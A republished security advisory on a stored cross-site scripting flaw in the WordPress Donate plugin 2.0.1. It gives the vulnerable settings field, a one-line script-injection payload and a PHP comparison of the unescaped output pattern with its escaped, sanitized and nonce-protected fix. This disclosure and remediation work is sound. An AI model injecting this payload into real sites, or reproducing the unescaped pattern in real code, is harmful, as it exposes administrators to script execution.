WordPress Donate 2.0.1 Cross Site Scripting

Published: 17 Dec 2015 | Reported by: Madhu Akula | Type: packetstorm | Source: packetstormsecurity.com

WordPress Donate 2.0.1 Cross Site Scripting vulnerability and fi

Plugin Name : Donate

Affected Version : 2.0.1 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Madhu Akula

Technical Details

Minimum Level of Access Required : Administrator

PoC - (Proof of Concept) :

On the plugin settings page below, enter the following payload in the dnt_paypal_purpose field and save the settings. The value is stored and is rendered back into the page without escaping, so the script executes for every administrator who subsequently opens the page.

http://localhost/wp-admin/admin.php?page=donate.php

dnt_paypal_purpose = '><script>alert(2)</script>

Vulnerable Parameter : dnt_paypal_purpose

Type of XSS : Stored

Fixed in : 2.0.1 (as stated in the original advisory; this is the same version listed as affected above, so consult the changelog linked below for the release that actually carries the fix)

http://wordpress.org/plugins/donate-button/changelog/

Disclosure Timeline

Vendor Contacted : 2014-08-04

Plugin Status : Updated on 2014-08-07

Public Disclosure : October 3, 2015

CVE Number : Not assigned yet

Plugin Description :

The Donate plugin helps to collect donations through payment systems such as PayPal or 2CheckOut. It has a user-friendly and simple interface which allows you to place the donate button anywhere on the site.
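As an added illustration (this is not the Donate plugin's actual code, which the advisory does not reproduce), the pattern behind this class of bug in a WordPress settings page, with the hardened form beside it. The option name dnt_paypal_purpose is taken from the advisory; the dnt_example_ function names and the dnt_example_save nonce action are hypothetical.

```php
<?php
// Added example, not the Donate plugin's own code. It reconstructs the bug class
// the advisory describes: a settings value stored through the WordPress options
// API and later echoed into an <input value="..."> attribute without escaping.

// --- Vulnerable pattern (hypothetical reconstruction) ---
function dnt_example_render_field_vulnerable() {
    $purpose = get_option('dnt_paypal_purpose', '');
    // The stored payload '><script>alert(2)</script> closes the value attribute
    // and the <input> tag, so the script runs for every admin who loads the page.
    echo '<input type="text" name="dnt_paypal_purpose" value="' . $purpose . '">';
}

// --- Hardened pattern: escape on output ---
function dnt_example_render_field_fixed() {
    $purpose = get_option('dnt_paypal_purpose', '');
    // esc_attr() encodes quotes, <, > and &, so the value cannot break out of
    // the attribute regardless of what was stored.
    echo '<form method="post">';
    wp_nonce_field('dnt_example_save'); // hypothetical nonce action for CSRF protection
    echo '<input type="text" name="dnt_paypal_purpose" value="' . esc_attr($purpose) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}

// --- Hardened pattern: validate on input as well ---
function dnt_example_save_settings() {
    // Only administrators (manage_options) may change plugin settings.
    if (!current_user_can('manage_options')) {
        return;
    }
    // Reject requests that do not carry a valid nonce, so a logged-in admin
    // cannot be made to store the payload by visiting an attacker's page.
    check_admin_referer('dnt_example_save');

    $raw = isset($_POST['dnt_paypal_purpose']) ? wp_unslash($_POST['dnt_paypal_purpose']) : '';
    // sanitize_text_field() strips tags and stray control characters before
    // the value ever reaches the database; the purpose string is plain text.
    update_option('dnt_paypal_purpose', sanitize_text_field($raw));
}
```

Escaping on output is the fix that closes the XSS; sanitizing on input and requiring a nonce are defence in depth. The nonce matters here because the advisory's minimum access level is Administrator: on a single-site WordPress install administrators already hold the unfiltered_html capability, so the practical impact of an admin-only stored XSS comes from chaining it with CSRF against an administrator, or from multisite installs where site administrators lack unfiltered_html.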
